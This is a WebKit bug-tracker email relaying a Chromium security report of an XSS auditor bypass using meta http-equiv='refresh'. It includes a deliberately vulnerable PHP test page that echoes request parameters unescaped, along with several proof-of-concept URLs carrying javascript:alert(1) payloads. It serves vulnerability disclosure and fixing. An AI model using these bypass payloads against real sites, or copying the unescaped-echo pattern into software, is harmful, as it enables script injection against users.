[Webkit-unassigned] [Bug 67091] New: XSS auditor bypass with http-equiv="refresh"

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sat Aug 27 13:30:16 PDT 2011 

https://bugs.webkit.org/show_bug.cgi?id=67091

           Summary: XSS auditor bypass with http-equiv="refresh"
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: Unspecified
        OS/Version: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: WebKit Misc.
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: abarth at webkit.org
                CC: dbates at webkit.org
            Blocks: 66579


http://code.google.com/p/chromium/issues/detail?id=94482


Reported by j.terh... at gmail.com, Today (4 hours ago)
VULNERABILITY DETAILS
A basic reflected XSS, using the <meta http-equiv="refresh" /> vector, is allowed by the XSS filter.

VERSION
Chrome Version: 13.0.782.215 m + stable
Operating System: Windows NT 5.1 build 2600 (Windows XP Home Edition Service Pack 3) i586

REPRODUCTION CASE
Place the attached php file in a web accessible directory of a php enabled apache server at http://<host>/xss.php and call:
http://<host>/xss.php?refresh=javascript:alert(1)

The alert is shown and no blocking message is posted to the console. However the call:
http://<host>/xss.php?body=%3Cscript%3Ealert(1)%3C/script%3E 

_is_ blocked and the usual blocking message ("Refused to execute a JavaScript script. Source code of script found within request.") is posted to the console. See screenshots refresh.jpg and basic.jpg.

ADDITIONAL:
If line 4 of the php script is changed to:
echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />";

the filter will also miss the reflected XSS if called as follows: 
http://<host>/xss.php?refresh=alert(1)

Also if line 4 is changed to:
echo "<meta http-equiv='refresh' {$_GET['refresh']} />";

and called using:
http://<host>/xss.php?refresh=content=%220;%20url=javascript:alert(1)%22

the XSS is also allowed. _However_ if line 4 is changed to:
echo "<meta {$_GET['refresh']} />";

and the call:
http://<host>/xss.php?refresh=http-equiv=%22refresh%22%20content=%220;%20url=javascript:alert(1)%22

is made, the filter WILL detect the XSS (see screenshot refresh2.jpg)

PHP Version: 5.3.5
Apache: Apache/2.2.17 (Win32) compiled with MSVC6


<html>
<?php
        if( isset($_GET['refresh']) ) {
                //echo "<meta http-equiv='refresh' content='0; url={$_GET['refresh']}' />";
                echo "<meta http-equiv='refresh' {$_GET['refresh']} />";
                //echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />";
        }
?>
<body>
<?php
        if( isset($_GET['body']) ) {
                echo $_GET['body'];
        }
?>
</body>
</html>

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

More information about the webkit-unassigned mailing list